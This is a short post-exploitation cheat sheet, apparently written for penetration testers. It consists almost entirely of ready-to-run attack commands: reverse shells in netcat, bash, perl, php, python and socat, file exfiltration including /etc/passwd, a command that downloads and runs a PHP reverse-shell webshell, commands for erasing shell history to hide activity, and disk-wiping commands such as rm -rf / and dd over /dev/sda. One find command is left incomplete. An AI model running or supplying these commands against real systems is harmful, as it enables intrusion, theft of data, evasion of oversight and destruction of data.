The Post Exploitation phase will determine the control of the machine compromised and will maintain the control for later use.
Netcat Reverse Shells
Listener:
nc -lvp 4444
Target:
Windows: nc.exe 192.168.1.1 4444 -e cmd.exe
Linux: nc 192.168.1.1 4444 -e /bin/bash
Reverse Shells
Listener:
nc -lvp 4444
Target:
bash -i >& /dev/tcp/192.168.1.1/4444 0>&1
perl -e 'use Socket;$i="192.168.1.1";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php -r '$sock=fsockopen("192.168.1.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.1.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.1 4444 >/tmp/f
0<&196; exec 196<>/dev/tcp/192.168.1.1/4444; sh <&196 >&196 2>&196
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.1:4444
Send files
exec 3<>/dev/tcp/192.168.1.1/4444 && cat /etc/passwd>&3
Send Files through Netcat
Listener:
netcat -l 4444 > received_file
Target:
netcat 192.168.1.1 4444 < original_file
Listener:
netcat -l 4444 | tar xzvf -
Target:
tar -czf - * | netcat 192.168.1.1 4444
File upload in Windows with PowerShell
[Windows / DOS / PowerShell] File upload in command line
PHP webshells
wget -O /tmp/php_shell.php https://raw.githubusercontent.com/JohnTroony/php-webshells/master/php-reverse-shell.php && php -f /tmp/php_shell.php
Covering the tracks
Avoiding history
export HISTFILE=
unset HISTFILE
Clear history
rm -rf .bash_history
touch .bash_history (invasive)
history -c
set +o history
Destroy
rm -rf /
find / -type f -exec {}
mkfs.ext3 /dev/sda
dd if=/dev/zero of=/dev/sda bs=1M